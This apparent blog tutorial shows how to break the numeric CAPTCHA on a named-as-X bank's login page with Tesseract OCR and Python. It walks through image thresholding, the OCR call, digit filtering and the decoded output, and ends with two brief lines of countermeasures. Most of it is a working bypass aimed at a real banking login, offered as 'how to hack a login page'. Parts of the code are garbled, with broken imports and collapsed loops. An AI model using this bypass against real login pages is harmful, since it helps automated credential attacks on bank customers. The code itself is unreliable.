Case Study: Cracking Online Banking CAPTCHA Login Using Python 2023

In this article we will learn about Cracking Online Banking CAPTCHA Login Using Python.

Introduction to Cracking Online Banking CAPTCHA Login Using Python:

CAPTCHA has been implemented for decades to prevent automated scripts (bots) from tampering with registration or login pages. Even though a lot of tools and research have revealed its weakness in the ability to convert an image to plain text, there are still plenty of insecure images being used on sensitive login pages like online banking!

Believe it or not, today we are going to discuss a real-life example of how to hack a login page for one of the largest leading banks in the Middle East!

[download]

Optical Character Recognition (OCR)

In short, OCR is a technology that allows you to convert scanned images of text into plain text. This allows your script to read the text and send it to the login form just like a human action.

The OCR engine has been developed into many kinds of object-oriented OCR applications, such as OCR of invoices and OCR of legal billing documents. However, here it will be used to defeat CAPTCHA anti-bot systems.

Also Read:Ethical Hacking Interview Questions 2023

Under Linux, Tesseract is the most accurate OCR, although it lacks a graphical user interface (GUI) – only the CLI is needed to achieve our purpose. Installing Tesseract is very straight forward, in Ubuntu distribution problem:

[python]
hkhrais@Hkhrais:~$ sudo apt-get install tesseract-ocr
[/python]

Preparing images for Tesseract

Tesseract is not very flexible when it comes to the format of its input images. Only accepts TIFF images. According to user reports, compressed TIFF images are quite problematic, and the same is true for grayscale and color images. You’re better off with single-bit uncompressed TIFF images.

The process of preparing them using GIMP is very simple:

• Go to Image → Mode and make sure the image is in RGB or Grayscale mode.
• Choose Tools→Color Tools→Threshold from the menu and choose the appropriate threshold value.
• Select Image→Mode→Indexed from the menu and select 1-bit and no decomposition from the options.
• Save the image in TIFF format with a .tif extension.
• Note: Version 3.x includes layout analysis and, when compiled with Leptonica, supports all image formats supported by Leptonica. However, to increase the efficiency of the results, we will repeat the above steps automatically using a Python script to clean the image noise, focus the colors and possibly send the output image to Tesseract.

Analysis of the CAPTCHA image

**Disclaimer: Below are an exact samples taken from the login page of X bank without any modification**

In each image we see the following common factors:

-All pictures contain only 4 numbers [written in English]

• The color of the number is black

-There are no letters of the alphabet

-There is no number rotation [only one angle]

-All numbers are on one line

-Noise “which is a line crossing the numbers” can be removed with some image processing techniques.

Almost any image editor like Gimp can denoise these images and center the numbers to make them ready for OCR. With a quick tweak of the color-centered threshold in Gimp, we got the following cleaned-up image:

Now the above output is ready to be used in OCR to print the numbers. Obviously, this step needs to be done automatically by our script.

Process automation

Assuming our script goes to the X bank login page, download the CAPTCHA image to the ‘/home/hkhrais/Desktop/Downloaded_CAPTCHA/’ directory. The image preparation process would be:

[python]
from import PIL Image
import person
import time

def main():

getlist = os.listdir(“/home/hkhrais/Desktop//Downloaded_CAPTCHA/”)
number = int (len(getlist))
for cap in range(1,number+1):
crack(str(cap))
[/python]

The script starts by getting the list of downloaded CAPTCHA images stored in “/home/hkhrais/Desktop//Downloaded_CAPTCHA/” and passing the name of the image to a function called crack.

[python]
def crack(cap_name):

img = Image.open(‘/home/hkhrais/Desktop/Downloaded_CAPTCHA/’+cap_name+’.JPEG’)
img = img.convert(“RGB”)
pixdata = img.load()

for y in xrange(img.size[1]):
for x in xrange(img.size[0]):
if pixdata[x, y][0] < 90:
pixdata[x, y] = (0, 0, 0, 255)
for y in xrange(img.size[1]):
for x in xrange(img.size[0]):
if pixdata[x, y][1] < 136: pixdata[x, y] = (0, 0, 0, 255) for y in xrange(img.size[1]): for x in xrange(img.size[0]): if pixdata[x, y][2] > 0:
pixdata[x, y] = (255, 255, 255, 255)
ext = “.tif”
img.save(“/home/hkhrais/Desktop/Cleaned_CAPTCHA/”+cap_name + ext)
[/python]

First, the crack function loads the image into an img object and then converts it to RGB mode (remember the image preparation process for Tesseract?). The three For iterators are pure image processing that will make the numbers much fatter and clean up the background noise to white. Cleaned .tif images are stored in /home/hkhrais/Desktop/Cleaned_CAPTCHA/. The output would be:

[python]
command = “tesseract -psm 7 /home/hkhrais/Desktop/Cleaned_CAPTCHA/”+cap_name +”.tif “+”/home/hkhrais/Desktop/text”
os.system(command)
time.sleep(1)

Text = open (“/home/hkhrais/Desktop/text.txt”,”r”)
decoded = Text.readline().strip(‘n’)
if decoded.isdigit():
print ‘[+}CAPTCHA number are ‘ + decoded
else:
print ‘[-] Error : Not able to decode’
[/python]

One of the weak points mentioned earlier was all the numbers are in single line; Tesseract has a plenty of options for specifying the page/image segmentation mode. In our case here we need to specify segmentation mode number 7 which will treat the image as a single text line.

pagesegmode values are:

0 = Orientation and script detection (OSD) only.
1 = Automatic page segmentation with OSD.
2 = Automatic page segmentation, but no OSD, or OCR
3 = Fully automatic page segmentation, but no OSD. (Default)
4 = Assume a single column of text of variable sizes.
5 = Assume a single uniform block of vertically aligned text.
6 = Assume a single uniform block of text.
7 = Treat the image as a single text line.
8 = Treat the image as a single word.
9 = Treat the image as a single word in a circle.
10 = Treat the image as a single character.

The command line for Tesseract is simple:

[python]
#tesseract [-psm # ] <input type=”text” /> <output for=””>
[/python]

The second part of the secript is to increase the efficiency of our script. As we saw, all the images contain only numbers, so if Tesseract’s output was a special character or alphabetic letter, then definitely it’s an error! And before submitting the wrong value to the login page, we technically can discard it and submit the next image. Isdigit() function will take care of this portion.

[python]
hkhrais@Hkhrais:~$ sudo python /home/hkhrais/Desktop/decoder.py
[sudo] password for hkhrais:

[+}CAPTCHA number are 5905

[-] Error : Not able to decode

[+}CAPTCHA number are 7588

[+}CAPTCHA number are 6864

[+}CAPTCHA number are 2939

[+}CAPTCHA number are 9536
[/python]

Countermeasures

-Use a complex CAPTCHA, below are good examples, salting with alphabet letters with some rotations are always good.

-Don’t count on CAPTCHA only, step-2 authentication (token) is a perfect option to add as well.

References

• Optical character recognition

http://en.wikipedia.org/wiki/Optical_character_recognition

• Tesseract-OCR

http://code.google.com/p/tesseract-ocr/

• Tesseract usage

https://help.ubuntu.com/community/OCR#Tesseract

• Python OCR

http://blog.c22.cc/2010/10/12/python-ocr-or-how-to-break-captchas/